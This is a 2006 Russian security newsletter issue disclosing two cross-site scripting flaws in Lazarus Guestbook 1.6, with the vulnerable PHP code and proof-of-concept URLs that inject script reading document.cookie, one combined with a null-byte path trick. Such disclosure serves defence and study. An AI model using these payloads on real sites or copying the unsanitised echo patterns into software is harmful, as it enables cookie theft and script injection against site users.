Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Lazarus Guestbook. (comp.paper.supuser) : Рассылка : Subscribe.Ru

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Lazarus Guestbook.

IT-безопасность в быту и не только

Рассылка закрыта

Статистика

Отправляет email-рассылки с помощью сервиса Sendsay

При закрытии подписчики были переданы в рассылку "Безопасность. Статьи, новости, комментарии" на которую и рекомендуем вам подписаться.

Вы можете найти рассылки сходной тематики в Каталоге рассылок.

← Сентябрь 2006 →
	1	2	3
4 04.09.2006 08:05:19 12:05:07 15:05:17 17:05:44	5 05.09.2006 07:05:35 12:05:09 15:05:22 17:05:12	6 06.09.2006 07:05:40 12:05:11 17:05:24	7 07.09.2006 07:05:32 12:05:14 17:05:16	8 08.09.2006 07:05:17 12:05:07 17:05:14	9	10
11	12	13	14	15	16	17
18 18.09.2006 07:05:30 12:05:47 17:05:15	19	20	21	22	23	24
25	26	27	28	29	30

Автор

Forester

1.394 подписчиков
-1 за неделю

← Все выпуски →

← Сентябрь 2006 →

4 04.09.2006 08:05:19 12:05:07 15:05:17 17:05:44

5 05.09.2006 07:05:35 12:05:09 15:05:22 17:05:12

6 06.09.2006 07:05:40 12:05:11 17:05:24

7 07.09.2006 07:05:32 12:05:14 17:05:16

8 08.09.2006 07:05:17 12:05:07 17:05:14

18 18.09.2006 07:05:30 12:05:47 17:05:15

Компьютер для продвинутых пользователей

В этом выпуске:

Lazarus Guestbook

ПО: Lazarus Guestbook
Версия: 1.6

Уязвимость:
Первая уязвимость находиться в файле codes-english.php в параметре "show". Именно это параметр не проверяеться до выполнения. Это может быть использовано для написания и выполнеия HTML и JavaScript кодов.
Листинг уязвимости:
1 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
2 <html>
3 <head>
4 <title><?php echo($_GET['show']); ?></title>
Вторая уязвимость находиться в picture.php. В этом файле происходит выполнение скрипта в первую очередь, если за ним выводиться изображение на экране.
Листинг уязвимости:
24 if (!empty($_GET['img'])) {
26 if (file_exists("$GB_TMP/$_GET[img]")) {
27 $size = @GetImageSize("$GB_TMP/$_GET[img]");
28 $picture = "$GB_PG[base_url]/$GB_TMP/$_GET[img]";
29 }
... ............
49 <td align="center" valign="middle">
50 <?php
51 if (!empty($_GET['img']) && is_array($size)) {
52 echo "<a href=\"javascript:window.close()\"><img src=\"$picture\" width=\"$size[0]\" height=\"$size[1]\" border=\"0\">\n";
53 }
54 ?>
55 </td>
Использование:
http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E[XSS]
http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E<script>alert(document.cookie);</script>
http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3E[XSS]
http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3E<script>alert(document.cookie);</script>

Не забудьте проголосовать за выпуск!

Рассылка создана и ведется при поддержке Информационной сети Пермского края.

Меня можно найти:	ICQ - 273214003
	e-mail - isdmi1::mail.ru

В избранное